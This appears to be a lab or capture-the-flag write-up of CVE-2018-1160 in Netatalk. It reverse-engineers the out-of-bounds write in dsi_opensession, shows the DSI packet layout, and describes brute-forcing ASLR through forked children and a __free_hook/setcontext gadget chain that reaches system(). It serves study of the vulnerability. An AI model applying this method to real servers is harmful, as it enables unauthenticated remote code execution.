CVE-2018-1160 POC
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
Finding the sink and the source
I decided to start inspecting the pure binaries, to also work on my reversing skills.
Library
We create a new ghidra project, and inspect first afpd
. We see that a lot dsi_*
functions are imported. This is important, as the cve advisory mentions that the vulnerability is inside dsi_opensess
.
We got only two binaries, afpd
and libatalk
. Let’s add the library to the project and inspect it.
We immediately find the dsi_opensession
function.
Analysing the code we want to rename variables and add comments to make going through the code easier.
void dsi_opensession(long acid)
{
int iVar1;
uint acid_length;
uint uVar2;
int *piVar3;
char *pcVar4;
undefined1 *acid_6e8;
long lVar5;
ulong uVar6;
undefined8 *puVar7;
ulong uVar8;
byte bVar9;
undefined8 *acid_6d8;
byte acid_element;
undefined8 *value;
bVar9 = 0;
iVar1 = setnonblock(*(undefined4 *)(acid + 0x10714));
if (iVar1 < 0) {
if (1 < DAT_0037fa48) {
piVar3 = __errno_location();
pcVar4 = strerror(*piVar3);
make_log_entry(2,4,"dsi_opensess.c",0x1a,"dsi_opensession: setnonblock: %s",pcVar4);
}
netatalk_panic("setnonblock error");
/* WARNING: Subroutine does not return */
abort();
}
uVar6 = 0;
acid_6e8 = *(undefined1 **)(acid + 0x6e8);
acid_6d8 = (undefined8 *)(acid + 0x6d8);
if (*(long *)(acid + 0x106f8) != 0) {
do {
while( true ) {
/* acid_6e8[uvar6] == type */
iVar1 = (int)uVar6;
uVar8 = (ulong)(iVar1 + 1);
/* acid_6e8[uvar8] == length */
acid_element = acid_6e8[uVar8]; // [1] -> we control the length
acid_length = (uint)acid_element;
if (acid_6e8[uVar6] != '\x01') break;
value = (undefined8 *)(acid_6e8 + uVar8 + 1);
if (acid_length < 8) {
//[snip] - we don't care about lower lengths
}
else {
*acid_6d8 = *value;
*(undefined8 *)(acid + 0x6d0 + (ulong)acid_length) =
*(undefined8 *)((long)value + ((ulong)acid_length - 8)); // [2] - write at attacker controlled offset
puVar7 = (undefined8 *)(acid + 0x6e0U & 0xfffffffffffffff8);
lVar5 = (long)acid_6d8 - (long)puVar7;
value = (undefined8 *)((long)value - lVar5);
for (uVar6 = (ulong)(acid_length + (int)lVar5 >> 3); uVar6 != 0; uVar6 = uVar6 - 1) {
*puVar7 = *value;
value = value + (ulong)bVar9 * -2 + 1;
puVar7 = puVar7 + (ulong)bVar9 * -2 + 1;
}
LAB_00126098:
acid_6e8 = *(undefined1 **)(acid + 0x6e8);
}
acid_length = *(uint *)(acid + 0x6d8);
/* ntoh transformation */
*(uint *)(acid + 0x6d8) =
acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
acid_length << 0x18;
uVar6 = (ulong)(iVar1 + 2 + (uint)(byte)acid_6e8[uVar8]);
if (*(ulong *)(acid + 0x106f8) <= uVar6) goto LAB_00125fd0;
}
uVar6 = (ulong)(iVar1 + 2 + acid_length);
} while (uVar6 < *(ulong *)(acid + 0x106f8));
}
LAB_00125fd0:
*(undefined8 *)(acid + 0x106f8) = 0xc;
*(undefined1 *)(acid + 0x598) = 1;
*(undefined4 *)(acid + 0x59c) = 0;
*acid_6e8 = 0;
*(undefined1 *)(*(long *)(acid + 0x6e8) + 1) = 4;
acid_length = *(uint *)(acid + 0x6e0);
/* ntoh transformation */
uVar2 = acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
acid_length << 0x18;
if (acid_length < 32000) {
uVar2 = 0x1000;
}
*(uint *)(*(long *)(acid + 0x6e8) + 2) = uVar2;
*(undefined1 *)(*(long *)(acid + 0x6e8) + 6) = 2;
*(undefined1 *)(*(long *)(acid + 0x6e8) + 7) = 4;
*(undefined4 *)(*(long *)(acid + 0x6e8) + 8) = 0x80000000;
acid_length = (uint)*(undefined8 *)(acid + 0x106f8);
/* ntoh transformation */
*(uint *)(acid + 0x5a0) =
acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
acid_length << 0x18;
dsi_stream_send(acid,*(undefined8 *)(acid + 0x6e8));
return;
}
The first important part of the code, is at [1]
, here we have TLV (type-length-value) structure. All these fields are attacker controled. We want to focus especially on the length.
At [2]
, the length is used to write to a buffer, without any bound checks, allowing an attacker to write at arbitrary addresses in memory.
This seems to be a classic out of bounds write.
The line *(undefined8 *)(acid + 0x6d0 + (ulong)acid_length) = *(undefined8 *)((long)value + ((ulong)acid_length - 8));
copies bytes from value + (acid_length - 8)
to the destination at acid + 0x6d0 + acid_length
.
So, we can write an arbitrary value at an arbitrary address. Also, lucky for us, that value shouldn’t be overwritten further in the code, so once we write out bytes at a desired address, we are done with them.
Now, that we discovered the sink, we must discover the source - how an unauthenticated remote attacker can interact with this code, and how can this bug be exploited.
The dsi_opensession
function is called only by dsi_getsession
.
dsi_getsession
is called by no other function inside the library code, however it is exported to the main binary, so we will probably want to look there to find the actual source.
However, we must also understand what happens at this level.
A socket is created, and set to nonblock.
Then, fork
is used to create a child process. This is important to us, as only if the fork
call succeeds will the dsi_getsession
function be called.
If fork succeeds, here is the code that interests us:
if (__pid == 0) {
/* block 1 */
lVar7 = *(long *)((long)param_1 + 8);
*(undefined4 *)(lVar7 + 0x2370) = *(undefined4 *)(param_2 + 0x28);
*(undefined4 *)(lVar7 + 0x2374) = *(undefined4 *)(param_2 + 0x2c);
*(int *)(lVar7 + 0x2358) = local_cc;
close(sock);
close(*(int *)((long)param_1 + 0x10718));
*(undefined4 *)((long)param_1 + 0x10718) = 0xffffffff;
server_child_free(param_2);
/* block 2 */
if (*(char *)((long)param_1 + 0x599) == '\x03') {
dsi_getstatus(param_1);
p_Var9 = (__fd_mask *)local_c8;
for (lVar7 = 0x10; lVar7 != 0; lVar7 = lVar7 + -1) {
*p_Var9 = uVar8;
p_Var9 = p_Var9 + 1;
}
lVar7 = __fdelt_chk((long)*(int *)((long)param_1 + 0x10714));
local_c8[lVar7] =
local_c8[lVar7] | 1L << ((byte)(*(int *)((long)param_1 + 0x10714) % 0x40) & 0x3f);
free(param_1);
select(0x400,(fd_set *)local_c8,(fd_set *)0x0,(fd_set *)0x0,(timeval *)&DAT_0037f5d0);
/* WARNING: Subroutine does not return */
exit(0);
}
/* block 3 */
if (*(char *)((long)param_1 + 0x599) != '\x04') {
if (4 < debug_level) {
make_log_entry(5,4,"dsi_getsess.c",0x79,"DSIUnknown %d");
}
(**(code **)((long)param_1 + 0x10760))(param_1);
/* WARNING: Subroutine does not return */
exit(1);
}
/* block 4 */
*(long *)((long)param_1 + 0x6b8) = (long)param_3;
*(long *)((long)param_1 + 0x6a8) = (long)param_3;
*(undefined8 *)((long)param_1 + 0x6c0) = 0;
*(undefined8 *)((long)param_1 + 0x6b0) = 0;
dsi_opensession(param_1);
*param_4 = 0;
uVar8 = (ulong)uVar2;
}
Let’s split this in blocks
lVar7 = *(long *)((long)param_1 + 8);
*(undefined4 *)(lVar7 + 0x2370) = *(undefined4 *)(param_2 + 0x28);
*(undefined4 *)(lVar7 + 0x2374) = *(undefined4 *)(param_2 + 0x2c);
*(int *)(lVar7 + 0x2358) = local_cc;
close(sock);
close(*(int *)((long)param_1 + 0x10718));
*(undefined4 *)((long)param_1 + 0x10718) = 0xffffffff;
server_child_free(param_2);
Update Session Structure:
lVar7 = *(long *)((long)param_1 + 8)
gets a pointer fromparam_1 + 8
(likely a session or server structure).- Copies fields from param_2 + 0x28 and param_2 + 0x2c (likely server configuration, e.g., port or address) to lVar7 + 0x2370 and lVar7 + 0x2374.
- Sets lVar7 + 0x2358 to local_cc (the child’s socket for communication).
Close Unused Sockets:
- Closes local_d0 (parent’s socket, not needed in child).
- Closes the socket at param_1 + 0x10718 (likely the original client socket) and sets it to -1.
Impact on dsi_opensession:
- Sets up the session structure (param_1) with the child’s socket (local_cc), which dsi_opensession uses (at acid + 0x10714) for non-blocking I/O.
- Ensures param_1 is ready for session processing.
if (*(char *)((long)param_1 + 0x599) == '\x03') {
dsi_getstatus(param_1);
p_Var9 = (__fd_mask *)local_c8;
for (lVar7 = 0x10; lVar7 != 0; lVar7 = lVar7 + -1) {
*p_Var9 = uVar8;
p_Var9 = p_Var9 + 1;
}
lVar7 = __fdelt_chk((long)*(int *)((long)param_1 + 0x10714));
local_c8[lVar7] =
local_c8[lVar7] | 1L << ((byte)(*(int *)((long)param_1 + 0x10714) % 0x40) & 0x3f);
free(param_1);
select(0x400,(fd_set *)local_c8,(fd_set *)0x0,(fd_set *)0x0,(timeval *)&DAT_0037f5d0);
/* WARNING: Subroutine does not return */
exit(0);
}
param_1 + 0x599
represents the command received. In this case, if the command is \x03
, dsi_getstatus
is called, and the child process exits. We want to avoid falling in this branch.
if (*(char *)((long)param_1 + 0x599) != '\x04') {
if (4 < debug_level) {
make_log_entry(5,4,"dsi_getsess.c",0x79,"DSIUnknown %d");
}
(**(code **)((long)param_1 + 0x10760))(param_1);
/* WARNING: Subroutine does not return */
exit(1);
}
If the command is different from \x03
or \0x04
it is invalid, so the child process exists with an error. This means, that to reach the next block (that is our golden block - as it calls dsi_opensession
) we must set this byte to \x04
.
*(long *)((long)param_1 + 0x6b8) = (long)param_3;
*(long *)((long)param_1 + 0x6a8) = (long)param_3;
*(undefined8 *)((long)param_1 + 0x6c0) = 0;
*(undefined8 *)((long)param_1 + 0x6b0) = 0;
dsi_opensession(param_1);
*param_4 = 0;
uVar8 = (ulong)uVar2;
Finally, we get the to the block that calls dsi_opensession
.
This sets two values from the param_1
structure to param_3
(likely some sort of timeouts), and another two values to 0.
Then, we finally call our sink function.
Now, is time to finally move to the main binary and check the calls made to dsi_getsession
.
Main Binary
As previously mentioned, the main binary only imports dsi_getsession
. This function is called only once, in the main
function.
main
is a bit too big to go into all details here. This is the high-level summary of this code.
The main function initializes the Netatalk server by:
- Parsing command-line and configuration files.
- Setting up signal handlers and file descriptor limits.
- Initializing the socket handler and CNID database.
- Entering a
poll
loop to handle incoming connections and child process events. - Calling
dsi_getsession
for new connections, which forks a child process and callsdsi_opensession
forDSI_OPENSESSION
commands. - Managing configuration reloads and child process cleanup.
This is the outline of the main_poll_loop
, it waits for events on file descriptors. When the poll loop detects incoming connections, leading to session creation => call of dsi_getsession
.
main_poll_loop:
do {
while( true ) {
pthread_sigmask(1,&local_158,(__sigset_t *)0x0);
iVar5 = poll((pollfd *)*plVar14,(long)*(int *)((long)plVar14 + 0x14),-1);
pthread_sigmask(0,&local_158,(__sigset_t *)0x0);
if (DAT_0035c5b0 == 0) break;
...
}
...
} while( true );
This is the code responsible for handling events.
if (iVar5 != 0) {
if (iVar5 < 0) {
if (__errnum != 4) {
if (1 < (uint)type_configs._56_4_) {
pcVar9 = strerror(__errnum);
make_log_entry(2,3,"main.c",0x198,"main: can\'t wait for input: %s",pcVar9);
}
return 0;
}
}
else {
lVar11 = 0;
if (0 < *(int *)((long)DAT_0035c5a8 + 0x14)) {
do {
if ((*(byte *)(*plVar14 + 6 + lVar11 * 8) & 0x39) != 0) {
piVar8 = (int *)(lVar11 * 0x10 + plVar14[1]);
if (*piVar8 == 0) {
...
}
else if (*piVar8 == 1) {
uVar12 = *(undefined8 *)(piVar8 + 2);
local_168.rlim_cur = 0;
iVar5 = dsi_getsession(uVar12,DAT_0035c5b8,DAT_0035c5e4,&local_168);
...
}
}
lVar11 = lVar11 + 1;
} while (iVar5 + 1 < *(int *)((long)plVar14 + 0x14));
}
}
}
If poll returns events (iVar5 > 0):
- Iterates over file descriptors in
DAT_0035c5a8
. - For each event, checks the type at piVar8:
- If 0, handles IPC requests from children (ipc_server_read).
- If 1, calls
dsi_getsession(uVar12, DAT_0035c5b8, DAT_0035c5e4, &local_168)
to start a new session.
uVar12
becomes param_1
in dsi_getsession
, passed as acid to dsi_opensession
. Also, uVar12
contains the client’s network packet - acid_6e8
.
Before being passed as an argument uVar12 gets assigned a pointer from piVar8
.
uVar12 = *(undefined8 *)(piVar8 + 2);
Now, we know the complete flow of how a data packet gets from an attacker to the sink.
We can also confirm our analysis looking at the packet layout as per the specifications: https://en.wikipedia.org/wiki/Data_Stream_Interface.
dsi_hdr = struct.pack(">BBHLLL",
0x00, # Flags (request)
0x04, # Command (OpenSession)
0x0001, # Req-ID
0x00000000, # Error / Offset
0x00000006, # Data-len
0x00000000) # Reserved
option = struct.pack(">BBL",
0x00, # DSIOPT_SERVQUANT
0x04, # length
0x00004000) # 16 KB
Exploiting
While we found our sink using nothing but the provided binaries, we would like to have access to the source code as well, as it is open source. This code is using custom data structures that are hard to follow so it is hard to pinpoint exactly what we are overwriting. The only solution to continue analysing properly while relying only on the binary would be to create a custom datatype in Ghidra, but this seems like an overkill.
The write out of bounds in the source code looks like this:
case DSIOPT_ATTNQUANT:
memcpy(&dsi->attn_quantum, dsi->commands + i + 1,
dsi->commands[i]);
dsi->commands + i + 1
-> is the value
dsi->commands[i]
-> is the length
and we overwrite dsi->attn_quantum
Also, note that dsi->commands
has a maximum length of 255 bytes.
typedef struct DSI {
struct DSI *next; /* multiple listening addresses */
AFPObj *AFPobj;
int statuslen;
char status[1400];
char *signature;
struct dsi_block header;
struct sockaddr_storage server, client;
struct itimerval timer;
int tickle; /* tickle count */
int in_write;
int msg_request; /* pending message to the client */
int down_request; /* pending SIGUSR1 down in 5 mn */
uint32_t attn_quantum, datasize, server_quantum;
uint16_t serverID, clientID;
uint8_t *commands; /* DSI receive buffer */
uint8_t data[DSI_DATASIZ]; /* DSI reply buffer */
size_t datalen, cmdlen;
This is how the DSI struct looks like. We can overwrite attn_quantum
, datasize
, server_quantum
, serverID
, clientID
, commands
and part of data
.
What is dsi->commands
used for? The comment hints that it is a receive buffer, hinting that it point to a buffer where an attacker can also write.
After the getsession
call is made, a call to afp_over_dsi
is made. This function has a main loop where it calls dsi_stream_receive()
.
Here the following call is made: dsi_stream_read(dsi, dsi->commands, dsi->cmdlen)
. This function reads data into dsi->commands
.
Defeating ASLR
While the original exploit focused on an environment where this binary was not protected by ASLR, we must exploit in a more hardened environment. We don’t have / don’t know of any address leak vulnerability that could help us defeat ASLR.
However, remember that our code is running inside a fork()
. This is important for us for 2 reasons:
- We can crash the program as many times as we want. Alternatively, if the code was ran inside the main thread of execution a crash would mean crashing the target.
fork
s share the same address space with the main program. This means that if we find a valid address for afork
we find a valid address for any fork.
These two conditions work in our favour as it means we can try to guess a valid address and get an idea of the address space at runtime.
We know that we can overwrite the commands pointer. The neat part is that if the address is invalid (an address that’s not part of the heap), the fork crashes and we get no response from the server. If we manage to guess a correct address (wherever it may point on the heap) we get a garbage response. So, we can try to guess addresses until we get a response => we don’t need an address leak. Also, keep in mind we want to find a valid heap page, not necessarily granular address.
Finding libc
base
However, for a valid exploit more than just a random heap address is needed. Ideally, we want to find the base address of libc
.
Let’s say the address we leaked at the previous step is called leaked_addr
. Because when brute-forcing each byte we started from 0XFF
and went down, this means we will find a rather big heap address, so libc_base
= leaked_addr
- offset
.
However, how can we now the offset? Well, we are going to guess it as well. The offset should be anywhere between 0
and 0xffff000
. We are only going to try 0xXXXX000
values, so this shouldn’t take up a lot.
If we guessed the offset
our exploit will work, otherwise it will fail.
Building a ROP chain
Now, armed with libc
’s base address is time to build a ROP chain that we can use to get a shell.
Taking control
The first question here is how can we hijack the program’s execution flow? We have no possibility of overwriting the stack, so how can we somehow still do this? The answer is: hooks.
hook
s are special variables (function pointers) within the libc
library. Their purpose is for debugging memory allocation. By default, each hook is NULL
. However, if it’s set to the address of a function, then every time the hooked function is called anywhere in the program, the program will instead call the function pointed to by the hook.
We can overwrite any of the hooks and make them point to wherever* we want. Then, anytime the function we hooked is called, our code is actually executed. Considering the flow of our exploit, free
is the most logical target, as it gets called once we close the socket to free all the memory used for the new connection.
* - of course, it needs to be valid executable code, NX is a thing, it’s not the 91s anymore
Our goal is to somehow call system
. However, we have a problem. When free()
gets called it receives as an argument a pointer to whatever memory the program tries to free. If we overwrite __free_hook
with the system
address, system
will get that pointer as an argument. Instead, we must pass a valid command as an argument.
Full takeover
A very useful gadgets when it comes to such exploits is setcontext
. setcontext
is a legitimate libc
function that can restore a full CPU context (all registers, instruction pointer, stack pointer) from a special structure in memory.
; setcontext + 53
mov rsp, [rdi+0a0h]
mov rax, [rdi+80h]
mov rbp, [rdi+78h]
mov r12, [rdi+48h]
mov r13, [rdi+50h]
mov r14, [rdi+58h]
mov r15, [rdi+60h]
mov rax, [rdi+0a8h]
push rcx
mov rsi, [rdi+70h]
mov rdx, [rdi+88h]
mov rcx, [rdi+98h]
mov r8, [rdi+28h]
mov r9, [rdi+30h]
mov rdi, [rdi+68h]
xor eax, eax
retn
Using setcontext
we can place arbitrary values in both rdi
and rip
. If we overwrite rip
with the system
address and rdi
with a valid command, then we get command execution.
However, we still have a problem - setcontext
uses rdi
to take the values it sets the pointers to from memory. So, before calling this function we must make rdi
point to a memory address where we have stored just the right values.
Preparing for T-0 seconds
So, we must find a way to make rdi
point to a controllable memory region - let’s call it mem
.
_dl_open_hook
is stored at an offset of +0x2BC0
from __free_hook
. This means we can overwrite this address as well. This leads us to the libc_dlopen_mode + 56
gadget. This gadget first loads the value stored at the address of _dl_open_hook
into the rax
register. Then it calls the function pointer stored at the address now in rax
.
mov rax, qword ptr [rip + <offset_to__dl_open_hook>] ; essentially mov rax, cs:_dl_open_hook
call qword ptr [rax]
The before-mentioned value is our mem
pointer.
When libc_dlopen_mode + 56
calls rax
, it basically calls a pointer stored at mem
. (call **mem). We control this address, and will want to call fgetpos64 + 207
.
mov rdi, rax
call qword ptr [rax + 0x20]
This gadget simply copies rax
to rdi
, then calls a function pointer stored at mem+0x20
. This means that finally rdi
points to mem
and we are ready to call setcontext
. Of course, we now want to store the setcontext+53
value at mem+0x20
so it gets called by this pointer.
Putting it all together
So, to recap, we have the following ROP chain:
We want to overwrite __free_hook
and _dl_open_hook
. __free_hook
will point to our first gadget and _dl_open_hook
to memory we control.
Now, when free()
gets called the following chain of events happen:
libc
sees that__free_hook != NULL
so it calls the address stored there, which islibc_dlopen_mode + 56
libc_dlopen_mode + 56
copies the pointer from_dl_open_hook
which is a pointer tomem
into therax
register. Then, it calls the function pointer present atmem
. This pointer must point tofgetpos64 + 207
fgetpos64 + 207
this gadget copiesrax
tordi
so nowrdi
points tomem
. Finally,rax+0x20
(which ismem+0x20
) is called. This should point tosetcontext + 53
setcontext+53
will usemem
to set the execution context.rdi
will point to our command string, andrip
tosystem
. We can useSigreturnFrame()
to easily preparemem
for this operation. Once these registers were correctly overwritten, whensetcontext
returns it will callrip
, basically callingsystem("cmd")
.
After putting everything together and writting an exploit I got hit by a harsh reality: it takes time to brute-force things. Also, it didn’t help that my connection to the server was weak.
After some digging I found out that the server is hosted in Japan. I deployed a small VPS machine in Japan, and ran the exploit from that machine. The ping time was ~600 times faster, and so was the exploit time.